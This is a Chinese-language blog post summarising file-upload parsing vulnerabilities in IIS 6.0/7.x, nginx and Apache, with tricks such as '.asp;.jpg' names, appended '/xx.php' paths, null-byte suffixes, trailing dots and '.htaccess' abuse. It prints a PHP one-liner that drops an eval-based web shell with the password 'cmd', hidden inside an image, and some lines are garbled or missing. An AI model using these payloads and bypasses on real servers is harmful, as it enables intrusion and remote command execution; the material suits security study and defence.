解析漏洞總結

2022-08-21 11:30:11 字數 1875 閱讀 6648

[+]iis 6.0

01.目錄解析:/xx.asp/xx.jpg  xx.jpg可替換為任意文字檔案(e.g. xx.txt),文字內容為後門**

02.iis6.0 會將 xx.jpg 解析為 asp 檔案。

03.字尾解析:/xx.asp;.jpg     /xx.asp:.jpg(此處需抓包修改檔名)

04.iis6.0 都會把此類字尾檔案成功解析為 asp 檔案。

05.預設解析:/xx.asa    /xx.cer   /xx.cdx

06.iis6.0 預設的可執行檔案除了 asp 還包含這三種

07.此處可聯絡利用目錄解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg

[+]iis 7.0/iis 7.5/nginx <8.03

01.iis 7.0/iis 7.5/nginx <8.03

02.在預設fast-cgi開啟狀況下,在乙個檔案路徑(/xx.jpg)後面加上/xx.php會將 /xx.jpg/xx.php 解析為 php 檔案。

03.常用利用方法: 將一張圖和乙個寫入後門**的文字檔案合併 將惡意文字寫入的二進位制**之後,避免破壞檔案頭和尾

06./b 即二進位制[binary]模式

07./a 即ascii模式 xx.jpg正常檔案

08.yy.txt 內容 <?php fputs(fopen('shell.php','w'),'<?php eval($_post[cmd])?>');?>

09.意思為寫入乙個內容為 <?php eval($_post[cmd])?> 名稱為shell.php的檔案

10.######################################

11.找個地方上傳 xy.jpg ,然後找到 xy.jpg 的位址,在位址後加上 /xx.php 即可執行惡意文字。

12.然後就在目錄下生成一句話木馬 shell.php 密碼 cmd

複製**

[+]nginx <8.03

01.在fast-cgi關閉的情況下,nginx <8.03依然存在解析漏洞

02.在乙個檔案路徑(/xx.jpg)後面加上%00.php會將 /xx.jpg%00.php 解析為 php 檔案。

複製**

[+]apache

01.02.字尾解析:test.php.x1.x2.x3

03.apache將從右至左開始判斷字尾,若x3非可識別字尾,再判斷x2,直到找到可識別字尾為止,然後將該可識別字尾進解析

04.test.php.x1.x2.x3 則會被解析為php

05.經驗之談:php|php3|phtml 多可被apache解析

複製**

[+]其他一些可利用的

01.在windows環境下,xx.jpg[空格] 或xx.jpg. 這兩類檔案都是不允許存在的,若這樣命名,windows會預設除去空格或點,這也是可以被利用的!

02.在向一台windows主機上傳資料時,你可以抓包修改檔名,在後面加個空格或點,試圖繞過黑名單,若上傳成功,最後的點或空格都會被消除,這樣就可得到shell。

03.我記得fck php 2.6就存在加空格繞過的漏洞。

04.05.如果在apache中.htaccess可被執行(預設不執行,這是90sec裡的一位朋友說的,當初我並不知道),且可以被上傳,

06.那可以嘗試在.htaccess中寫入:

08.shell.jpg換成你上傳的檔案,這樣shell.jpg就可解析為php檔案

解析漏洞總結

iis 6.0 解析利用方法有兩種 1.目錄解析 檔案解析 第一種,在 下建立資料夾的名字為 asp asa 的資料夾,其目錄內的任何副檔名的檔案都被 iis當作 asp檔案來解析並執行。例如建立目錄 wooyun.asp 那麼 wooyun.asp 1.jpg 將被當作 asp檔案來執行。假設黑闊...

解析漏洞總結

zone某處總結的很好 解析漏洞總結erevus 2013 09 02 11 25 其中nginx解析漏洞的原因是 在php 的 fastcgi 方式下,php獲取環境變數的方式不正確。舉例 對映url時,兩個環境變數很重要 path info 預設 1 script filename 訪問.com...

解析漏洞總結

怎麼看 搭建平台 seo查詢 工具查詢 掃瞄工具 wwwscan,wvs,破殼等 手工查詢 判斷大小寫,伺服器系統 index.asp index.asp 6.0 檔案形式和資料夾形式 檔案形式 x.asp x.asp x.jpg gif,txt,png等 asp執行 資料夾形式 xx xx.asp...